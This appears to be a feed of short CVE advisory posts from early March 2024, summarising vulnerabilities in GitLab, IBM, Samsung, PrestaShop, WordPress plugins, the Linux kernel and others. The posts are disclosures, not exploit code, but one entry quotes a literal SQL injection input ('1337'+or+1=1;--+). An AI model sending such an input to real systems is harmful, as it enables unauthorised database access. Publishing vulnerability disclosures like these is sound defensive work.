🚨 CVE-2024-21358Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 17:37:44 |
🚨 CVE-2024-27929ImageSharp is a managed, cross-platform, 2D graphics library. A heap-use-after-free flaw was found in ImageSharp's InitializeImage() function of PngDecoderCore.cs file. This vulnerability is triggered when an attacker passes a specially crafted PNG image file to ImageSharp for conversion, potentially leading to information disclosure. This issue has been patched in version 3.1.3.🎖@cveNotify |
|
| 2024-03-05 17:37:39 |
🚨 CVE-2024-27564A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.🎖@cveNotify |
|
| 2024-03-05 17:37:38 |
🚨 CVE-2024-1372A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring SAML settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .🎖@cveNotify |
|
| 2024-03-05 16:37:33 |
🚨 CVE-2024-24098Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection via the News Feed.🎖@cveNotify |
|
| 2024-03-05 16:37:32 |
🚨 CVE-2022-46088Online Flight Booking Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the feedback form.🎖@cveNotify |
|
| 2024-03-05 14:37:41 |
🚨 CVE-2024-27627A reflected cross-site scripting (XSS) vulnerability exists in SuperCali version 1.1.0, allowing remote attackers to execute arbitrary JavaScript code via the email parameter in the bad_password.php page.🎖@cveNotify |
|
| 2024-03-05 14:37:40 |
🚨 CVE-2024-27623CMS Made Simple version 2.2.19 is vulnerable to Server-Side Template Injection (SSTI). The vulnerability exists within the Design Manager, particularly when editing the Breadcrumbs.🎖@cveNotify |
|
| 2024-03-05 14:37:39 |
🚨 CVE-2024-27622A remote code execution vulnerability has been identified in the User Defined Tags module of CMS Made Simple version 2.2.19. This vulnerability arises from inadequate sanitization of user-supplied input in the 'Code' section of the module. As a result, authenticated users with administrative privileges can inject and execute arbitrary PHP code.🎖@cveNotify |
|
| 2024-03-05 14:07:56 |
🚨 CVE-2023-38362IBM CICS TX Advanced 10.1 could disclose sensitive information to a remote attacker due to observable discrepancy in HTTP responses. IBM X-Force ID: 260814.🎖@cveNotify |
|
| 2024-03-05 14:07:55 |
🚨 CVE-2022-43890IBM Security Verify Privilege On-Premises 11.5 could disclose sensitive information through an HTTP request that could aid an attacker in further attacks against the system. IBM X-Force ID: 240453.🎖@cveNotify |
|
| 2024-03-05 13:37:32 |
🚨 CVE-2023-7103Authentication Bypass by Primary Weakness vulnerability in ZKSoftware Biometric Security Solutions UFace 5 allows Authentication Bypass.This issue affects UFace 5: through 12022024.🎖@cveNotify |
|
| 2024-03-05 12:38:02 |
🚨 CVE-2023-45599A CWE-646 “Reliance on File Name or Extension of Externally-Supplied File” vulnerability in the “iec61850” functionality of the web application allows a remote authenticated attacker to upload any arbitrary type of file into the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 12:37:55 |
🚨 CVE-2023-45598A CWE-862 “Missing Authorization” vulnerability in the “measure” functionality of the web application allows a remote unauthenticated attacker to access confidential measure information. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 12:37:54 |
🚨 CVE-2023-45595A CWE-434 “Unrestricted Upload of File with Dangerous Type” vulnerability in the “file_configuration” functionality of the web application allows a remote authenticated attacker to upload any arbitrary type of file into the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 12:37:53 |
🚨 CVE-2023-45594A CWE-552 “Files or Directories Accessible to External Parties” vulnerability in the embedded Chromium browser allows a physical attacker to arbitrarily download/upload files to/from the file system, with unspecified impacts to the confidentiality, integrity, and availability of the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 12:37:50 |
🚨 CVE-2023-45593A CWE-693 “Protection Mechanism Failure” vulnerability in the embedded Chromium browser (concerning the handling of alternative URLs, other than “ http://localhost” http://localhost” ) allows a physical attacker to read arbitrary files on the file system, alter the configuration of the embedded browser, and have other unspecified impacts to the confidentiality, integrity, and availability of the device. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 12:37:49 |
🚨 CVE-2022-48630In the Linux kernel, the following vulnerability has been resolved:crypto: qcom-rng - fix infinite loop on requests not multiple of WORD_SZThe commit referenced in the Fixes tag removed the 'break' from the elsebranch in qcom_rng_read(), causing an infinite loop whenever 'max' isnot a multiple of WORD_SZ. This can be reproduced e.g. by running: kcapi-rng -b 67 >/dev/nullThere are many ways to fix this without adding back the 'break', butthey all seem more awkward than simply adding it back, so do just that.Tested on a machine with Qualcomm Amberwing processor.🎖@cveNotify |
|
| 2024-03-05 12:37:48 |
🚨 CVE-2022-48629In the Linux kernel, the following vulnerability has been resolved:crypto: qcom-rng - ensure buffer for generate is completely filledThe generate function in struct rng_alg expects that the destinationbuffer is completely filled if the function returns 0. qcom_rng_read()can run into a situation where the buffer is partially filled withrandomness and the remaining part of the buffer is zeroed sinceqcom_rng_generate() doesn't check the return value. This issue canbe reproduced by running the following from libkcapi: kcapi-rng -b 9000000 > OUTFILEThe generated OUTFILE will have three huge sections that contain allzeros, and this is caused by the code where the test'val & PRNG_STATUS_DATA_AVAIL' fails.Let's fix this issue by ensuring that qcom_rng_read() always returnswith a full buffer if the function returns success. Let's also haveqcom_rng_generate() return the correct value.Here's some statistics from the ent project(https://www.fourmilab.ch/random/) that shows information about thequality of the generated numbers: $ ent -c qcom-random-before Value Char Occurrences Fraction 0 606748 0.067416 1 33104 0.003678 2 33001 0.003667 ... 253 � 32883 0.003654 254 � 33035 0.003671 255 � 33239 0.003693 Total: 9000000 1.000000 Entropy = 7.811590 bits per byte. Optimum compression would reduce the size of this 9000000 byte file by 2 percent. Chi square distribution for 9000000 samples is 9329962.81, and randomly would exceed this value less than 0.01 percent of the times. Arithmetic mean value of data bytes is 119.3731 (127.5 = random). Monte Carlo value for Pi is 3.197293333 (error 1.77 percent). Serial correlation coefficient is 0.159130 (totally uncorrelated = 0.0).Without this patch, the results of the chi-square test is 0.01%, andthe numbers are certainly not random according to ent's project page.The results improve with this patch: $ ent -c qcom-random-after Value Char Occurrences Fraction 0 35432 0.003937 1 35127 0.003903 2 35424 0.003936 ... 253 � 35201 0.003911 254 � 34835 0.003871 255 � 35368 0.003930 Total: 9000000 1.000000 Entropy = 7.999979 bits per byte. Optimum compression would reduce the size of this 9000000 byte file by 0 percent. Chi square distribution for 9000000 samples is 258.77, and randomly would exceed this value 42.24 percent of the times. Arithmetic mean value of data bytes is 127.5006 (127.5 = random). Monte Carlo value for Pi is 3.141277333 (error 0.01 percent). Serial correlation coefficient is 0.000468 (totally uncorrelated = 0.0).This change was tested on a Nexus 5 phone (msm8974 SoC).🎖@cveNotify |
|
| 2024-03-05 11:37:32 |
🚨 CVE-2023-5456A CWE-798 “Use of Hard-coded Credentials” vulnerability in the MariaDB database of the web application allows a remote unauthenticated attacker to access the database service and all included data with the same privileges of the web application. This issue affects: AiLux imx6 bundle below version imx6_1.0.7-2.🎖@cveNotify |
|
| 2024-03-05 11:37:31 |
🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-03-05 09:37:34 |
🚨 CVE-2024-26339swftools v0.9.2 was discovered to contain a strcpy parameter overlap via /home/swftools/src/swfc+0x48318a.🎖@cveNotify |
|
| 2024-03-05 09:37:33 |
🚨 CVE-2024-26335swftools v0.9.2 was discovered to contain a segmentation violation via the function state_free at swftools/src/swfc-history.c.🎖@cveNotify |
|
| 2024-03-05 09:37:32 |
🚨 CVE-2024-26334swftools v0.9.2 was discovered to contain a segmentation violation via the function compileSWFActionCode at swftools/lib/action/actioncompiler.c.🎖@cveNotify |
|
| 2024-03-05 08:37:36 |
🚨 CVE-2024-20833Use after free vulnerability in pub_crypto_recv_msg prior to SMR Mar-2024 Release 1 due to race condition allows local attackers with system privilege to cause memory corruption.🎖@cveNotify |
|
| 2024-03-05 08:37:35 |
🚨 CVE-2023-30733Stack-based Buffer Overflow in vulnerability HDCP trustlet prior to SMR Oct-2023 Release 1 allows local privileged attackers to perform code execution.🎖@cveNotify |
|
| 2024-03-05 06:37:26 |
🚨 CVE-2024-1062A heap overflow flaw was found in 389-ds-base. This issue leads to a denial of service when writing a value larger than 256 chars in log_entry_attr.🎖@cveNotify |
|
| 2024-03-05 05:37:39 |
🚨 CVE-2024-20839Improper access control in Samsung Voice Recorder prior to versions 21.5.16.01 in Android 12 and Android 13, 21.4.51.02 in Android 14 allows physical attackers to access recording files on the lock screen.🎖@cveNotify |
|
| 2024-03-05 05:37:32 |
🚨 CVE-2024-20838Improper validation vulnerability in Samsung Internet prior to version 24.0.3.2 allows local attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-03-05 05:37:31 |
🚨 CVE-2024-20835Improper access control vulnerability in CustomFrequencyManagerService prior to SMR Mar-2024 Release 1 allows local attackers to execute privileged behaviors.🎖@cveNotify |
|
| 2024-03-05 05:37:30 |
🚨 CVE-2024-20834The sensitive information exposure vulnerability in WlanTest prior to SMR Mar-2024 Release 1 allows local attackers to access MAC address without proper permission.🎖@cveNotify |
|
| 2024-03-05 05:37:26 |
🚨 CVE-2024-20831Stack overflow in Little Kernel in bootloader prior to SMR Mar-2024 Release 1 allows a privileged attackers to execute arbitrary code.🎖@cveNotify |
|
| 2024-03-05 05:37:25 |
🚨 CVE-2023-52432Improper input validation in IpcTxSndSetLoopbackCtrl in libsec-ril prior to SMR Sep-2023 Release 1 allows local attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-03-05 03:37:38 |
🚨 CVE-2024-21838Improper neutralization of special elements in output (CWE-74) used by the email generation feature of the Command Centre Server could lead to HTML code injection in emails generated by Command Centre. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all version of 8.60 and prior.🎖@cveNotify |
|
| 2024-03-05 03:37:37 |
🚨 CVE-2024-21815Insufficiently protected credentials (CWE-522) for third party DVR integrations to the Command Centre Server are accessible to authenticated but unprivileged users. This issue affects: Gallagher Command Centre 9.00 prior to vEL9.00.1774 (MR2), 8.90 prior to vEL8.90.1751 (MR3), 8.80 prior to vEL8.80.1526 (MR4), 8.70 prior to vEL8.70.2526 (MR6), all version of 8.60 and prior.🎖@cveNotify |
|
| 2024-03-05 02:37:32 |
🚨 CVE-2024-1095The Build & Control Block Patterns – Boost up Gutenberg Editor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the settings_export() function in all versions up to, and including, 1.3.5.4. This makes it possible for unauthenticated attackers to export the plugin's settings.🎖@cveNotify |
|
| 2024-03-05 02:37:25 |
🚨 CVE-2024-0698The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-05 02:37:24 |
🚨 CVE-2024-24213Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query. NOTE: the vendor's position is that this is an intended feature; also, it exists in the Supabase dashboard product, not the Supabase PostgreSQL product. Specifically, /pg_meta/default/query is for SQL queries that are entered in an intended UI by an authorized user. Nothing is injected.🎖@cveNotify |
|
| 2024-03-05 02:07:24 |
🚨 CVE-2024-21338Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-05 00:37:31 |
🚨 CVE-2024-27718SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component.🎖@cveNotify |
|
| 2024-03-05 00:37:30 |
🚨 CVE-2024-25164iA Path Traversal vulnerability exists in iDURAR v2.0.0, that allows unauthenticated attackers to expose sensitive files via the download functionality.🎖@cveNotify |
|
| 2024-03-05 00:37:29 |
🚨 CVE-2023-49970Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket.🎖@cveNotify |
|
| 2024-03-05 00:37:26 |
🚨 CVE-2023-49969Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer.🎖@cveNotify |
|
| 2024-03-05 00:37:25 |
🚨 CVE-2023-49547Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login.🎖@cveNotify |
|
| 2024-03-05 00:37:24 |
🚨 CVE-2023-49546Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php.🎖@cveNotify |
|
| 2024-03-04 22:37:33 |
🚨 CVE-2023-41827An improper export vulnerability was reported in the Motorola OTA update application, that could allow a malicious, local application to inject an HTML-based message on screen UI.🎖@cveNotify |
|
| 2024-03-04 21:37:25 |
🚨 CVE-2024-1319The Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the attendees list on any post type regardless of status. (e.g. draft, private, pending review, password-protected, and trashed posts).🎖@cveNotify |
|
| 2024-03-04 21:37:24 |
🚨 CVE-2024-1316The Event Tickets and Registration WordPress plugin before 5.8.1, Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the existence of certain events they shouldn't have access to. (e.g. draft, private, pending review, pw-protected, and trashed events).🎖@cveNotify |
|
| 2024-03-04 21:07:30 |
🚨 CVE-2024-1066An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to do a resource exhaustion using GraphQL `vulnerabilitiesCountByDay`🎖@cveNotify |
|
| 2024-03-04 21:07:29 |
🚨 CVE-2023-6840An issue has been discovered in GitLab EE affecting all versions from 16.4 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows a maintainer to change the name of a protected branch that bypasses the security policy added to block MR.🎖@cveNotify |
|
| 2024-03-04 20:37:32 |
🚨 CVE-2024-1525An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.1 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Under some specialized conditions, an LDAP user may be able to reset their password using their verified secondary email address and sign-in using direct authentication with the reset password, bypassing LDAP.🎖@cveNotify |
|
| 2024-03-04 20:37:26 |
🚨 CVE-2024-1451An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 before 16.9.1. A crafted payload added to the user profile page could lead to a stored XSS on the client side, allowing attackers to perform arbitrary actions on behalf of victims."🎖@cveNotify |
|
| 2024-03-04 20:37:25 |
🚨 CVE-2023-6477An issue has been discovered in GitLab EE affecting all versions starting from 16.5 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. When a user is assigned a custom role with admin_group_member permission, they may be able to make a group, other members or themselves Owners of that group, which may lead to privilege escalation.🎖@cveNotify |
|
| 2024-03-04 20:37:24 |
🚨 CVE-2023-6736An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.🎖@cveNotify |
|
| 2024-03-04 19:37:40 |
🚨 CVE-2021-47105In the Linux kernel, the following vulnerability has been resolved:ice: xsk: return xsk buffers back to pool when cleaning the ringCurrently we only NULL the xdp_buff pointer in the internal SW ring butwe never give it back to the xsk buffer pool. This means that bufferscan be leaked out of the buff pool and never be used again.Add missing xsk_buff_free() call to the routine that is supposed toclean the entries that are left in the ring so that these buffers in theumem can be used by other sockets.Also, only go through the space that is actually left to be cleanedinstead of a whole ring.🎖@cveNotify |
|
| 2024-03-04 19:37:39 |
🚨 CVE-2024-1829A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/regno/phone/username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254617 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-04 19:37:35 |
🚨 CVE-2024-1827A vulnerability was found in code-projects Library System 1.0 and classified as critical. This issue affects some unknown processing of the file Source/librarian/user/teacher/login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254615.🎖@cveNotify |
|
| 2024-03-04 19:37:34 |
🚨 CVE-2024-1820A vulnerability was found in code-projects Crime Reporting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file inchargelogin.php. The manipulation of the argument email/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254608.🎖@cveNotify |
|
| 2024-03-04 15:07:43 |
🚨 CVE-2023-29360Microsoft Streaming Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-04 11:38:24 |
🚨 CVE-2023-33104Transient DOS while processing PDU Release command with a parameter PDU ID out of range.🎖@cveNotify |
|
| 2024-03-04 11:38:18 |
🚨 CVE-2023-33103Transient DOS while processing CAG info IE received from NW.🎖@cveNotify |
|
| 2024-03-04 11:38:17 |
🚨 CVE-2023-33086Transient DOS while processing multiple IKEV2 Informational Request to device from IPSEC server with different identifiers.🎖@cveNotify |
|
| 2024-03-04 11:38:12 |
🚨 CVE-2023-33078Information Disclosure while processing IOCTL request in FastRPC.🎖@cveNotify |
|
| 2024-03-04 11:38:11 |
🚨 CVE-2023-28578Memory corruption in Core Services while executing the command for removing a single event listener.🎖@cveNotify |
|
| 2024-03-04 09:37:35 |
🚨 CVE-2023-42537An improper input validation in get_head_crc in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.🎖@cveNotify |
|
| 2024-03-04 09:37:34 |
🚨 CVE-2023-42536An improper input validation in saped_dec in libsaped prior to SMR Nov-2023 Release 1 allows local attackers to cause out-of-bounds read and write.🎖@cveNotify |
|
| 2024-03-04 08:38:04 |
🚨 CVE-2023-4479Stored XSS Vulnerability in M-Files Web versions before 23.8 allows attacker to execute script on users browser via stored HTML document within limited time period.🎖@cveNotify |
|
| 2024-03-04 07:37:32 |
🚨 CVE-2024-26622In the Linux kernel, the following vulnerability has been resolved:tomoyo: fix UAF write bug in tomoyo_write_control()Since tomoyo_write_control() updates head->write_buf when write()of long lines is requested, we need to fetch head->write_buf afterhead->io_sem is held. Otherwise, concurrent write() requests cancause use-after-free-write and double-free problems.🎖@cveNotify |
|
| 2024-03-04 07:37:25 |
🚨 CVE-2023-46708in OpenHarmony v3.2.4 and prior versions allow a local attacker arbitrary code execution in any apps through use after free.🎖@cveNotify |
|
| 2024-03-04 07:37:24 |
🚨 CVE-2023-25176in OpenHarmony v3.2.4 and prior versions allow a local attacker cause information leak through out-of-bounds Read.🎖@cveNotify |
|
| 2024-03-04 05:39:33 |
None |
|
| 2024-03-04 03:37:40 |
🚨 CVE-2023-4408The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.🎖@cveNotify |
|
| 2024-03-04 02:37:30 |
🚨 CVE-2024-22054A malformed discovery packet sent by a malicious actor with preexisting access to the network could interrupt the functionality of device management and discovery.Affected Products:UniFi Access PointsUniFi SwitchesUniFi LTE BackupUniFi Express (Only Mesh Mode, Router mode is not affected) Mitigation:Update UniFi Access Points to Version 6.6.55 or later.Update UniFi Switches to Version 6.6.61 or later.Update UniFi LTE Backup to Version 6.6.57 or later.Update UniFi Express to Version 3.2.5 or later.🎖@cveNotify |
|
| 2024-03-04 01:37:32 |
🚨 CVE-2024-2155A vulnerability was found in SourceCodester Best POS Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255587.🎖@cveNotify |
|
| 2024-03-04 01:37:31 |
🚨 CVE-2024-2153A vulnerability, which was classified as critical, was found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /admin/orders/view_order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255585 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-04 00:37:32 |
🚨 CVE-2024-2152A vulnerability, which was classified as critical, has been found in SourceCodester Online Mobile Management Store 1.0. Affected by this issue is some unknown functionality of the file /admin/product/manage_product.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255584.🎖@cveNotify |
|
| 2024-03-04 00:37:31 |
🚨 CVE-2024-28088LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.🎖@cveNotify |
|
| 2024-03-03 21:37:25 |
🚨 CVE-2024-28084p2putil.c in iNet wireless daemon (IWD) through 2.15 allows attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact because of initialization issues in situations where parsing of advertised service information fails.🎖@cveNotify |
|
| 2024-03-03 21:37:24 |
🚨 CVE-2019-25210An issue was discovered in Cloud Native Computing Foundation (CNCF) Helm through 3.13.3. It displays values of secrets when the --dry-run flag is used. This is a security concern in some use cases, such as a --dry-run call by a CI/CD tool. NOTE: the vendor's position is that this behavior was introduced intentionally, and cannot be removed without breaking backwards compatibility (some users may be relying on these values).🎖@cveNotify |
|
| 2024-03-03 18:37:25 |
🚨 CVE-2024-2150A vulnerability, which was classified as critical, has been found in SourceCodester Insurance Management System 1.0. This issue affects some unknown processing. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255503.🎖@cveNotify |
|
| 2024-03-03 18:37:24 |
🚨 CVE-2024-2149A vulnerability classified as critical was found in CodeAstro Membership Management System 1.0. This vulnerability affects unknown code of the file settings.php. The manipulation of the argument currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255502 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-03 17:37:26 |
🚨 CVE-2024-2147A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255500.🎖@cveNotify |
|
| 2024-03-03 16:37:26 |
🚨 CVE-2023-28512IBM Watson CP4D Data Stores 4.6.0, 4.6.1, and 4.6.2 could allow an attacker with specific knowledge about the system to manipulate data due to improper input validation. IBM X-Force ID: 250396.🎖@cveNotify |
|
| 2024-03-03 16:37:25 |
🚨 CVE-2022-43880IBM QRadar WinCollect Agent 10.0 through 10.1.2 could allow a privileged user to cause a denial of service. IBM X-Force ID: 240151.🎖@cveNotify |
|
| 2024-03-03 15:37:25 |
🚨 CVE-2024-0765As a default user on a multi-user instance of AnythingLLM, you could execute a call to the `/export-data` endpoint of the system and then unzip and read that export that would enable you do exfiltrate data of the system at that save state.This would require the attacked to be granted explicit access to the system, but they can do this at any role. Additionally, post-download, the data is deleted so no evidence would exist that the exfiltration occured.🎖@cveNotify |
|
| 2024-03-03 15:37:24 |
🚨 CVE-2024-1923A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as critical. Affected by this issue is the function delete_class/delete_student of the file /ajax-api.php of the component List of Classes Page. The manipulation of the argument id with the input 1337'+or+1=1;--+ leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254858 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-03 14:37:24 |
🚨 CVE-2024-2145A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /endpoint/update-tracker.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255498 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-03 13:37:26 |
🚨 CVE-2024-22355IBM QRadar Suite Products 1.10.12.0 through 1.10.18.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 280781.🎖@cveNotify |
|
| 2024-03-03 13:37:25 |
🚨 CVE-2023-47742IBM QRadar Suite Products 1.10.12.0 through 1.10.18.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 could disclose sensitive information using man in the middle techniques due to not correctly enforcing all aspects of certificate validation in some circumstances. IBM X-Force ID: 272533.🎖@cveNotify |
|
| 2024-03-03 13:37:24 |
🚨 CVE-2023-43054IBM Engineering Test Management 7.0.2 and 7.0.3 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 267459.🎖@cveNotify |
|
| 2024-03-03 12:37:25 |
🚨 CVE-2024-27255IBM MQ Operator 2.0.0 LTS, 2.0.18 LTS, 3.0.0 CD, 3.0.1 CD, 2.4.0 through 2.4.7, 2.3.0 through 2.3.3, 2.2.0 through 2.2.2, and 2.3.0 through 2.3.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 283905.🎖@cveNotify |
|
| 2024-03-03 12:37:24 |
🚨 CVE-2023-47745IBM MQ Operator 2.0.0 LTS, 2.0.18 LTS, 3.0.0 CD, 3.0.1 CD, 2.4.0 through 2.4.7, 2.3.0 through 2.3.3, 2.2.0 through 2.2.2, and 2.3.0 through 2.3.3 stores or transmits user credentials in plain clear text which can be read by a local user using a trace command. IBM X-Force ID: 272638.🎖@cveNotify |
|
| 2024-03-03 10:37:24 |
🚨 CVE-2024-26469Server-Side Request Forgery (SSRF) vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to cause a denial of service (DoS) and escalate privileges via the url parameter in the postProcess() method.🎖@cveNotify |
|
| 2024-03-03 09:37:26 |
🚨 CVE-2024-25847SQL Injection vulnerability in MyPrestaModules "Product Catalog (CSV, Excel) Import" (simpleimportproduct) modules for PrestaShop versions 6.5.0 and before, allows attackers to escalate privileges and obtain sensitive information via Send::__construct() and importProducts::_addDataToDb methods.🎖@cveNotify |
|
| 2024-03-03 09:37:25 |
🚨 CVE-2024-25839An issue was discovered in Webbax "Super Newsletter" (supernewsletter) module for PrestaShop versions 1.4.21 and before, allows local attackers to escalate privileges and obtain sensitive information.🎖@cveNotify |
|
| 2024-03-03 09:37:24 |
🚨 CVE-2024-24302An issue was discovered in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the postProcess() method.🎖@cveNotify |
|
| 2024-03-03 04:37:27 |
🚨 CVE-2024-25016IBM MQ and IBM MQ Appliance 9.0, 9.1, 9.2, 9.3 LTS and 9.3 CD could allow a remote unauthenticated attacker to cause a denial of service due to incorrect buffering logic. IBM X-Force ID: 281279.🎖@cveNotify |
|
| 2024-03-03 03:37:24 |
🚨 CVE-2023-49114A DLL hijacking vulnerability was identified in the Qognify VMS Client Viewer version 7.1 or higher, which allows local users to execute arbitrary code and obtain higher privileges via careful placement of a malicious DLL, if some specific pre-conditions are met.🎖@cveNotify |
|
| 2024-03-03 02:37:25 |
🚨 CVE-2024-1939Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-03 02:37:24 |
🚨 CVE-2021-31152Multilaser Router AC1200 V02.03.01.45_pt contains a cross-site request forgery (CSRF) vulnerability. An attacker can enable remote access, change passwords, and perform other actions through misconfigured requests, entries, and headers.🎖@cveNotify |
|
| 2024-03-03 01:37:25 |
🚨 CVE-2024-2134A vulnerability has been found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This vulnerability affects unknown code of the file /investigation/delete/ of the component Investigation Report Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255496. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
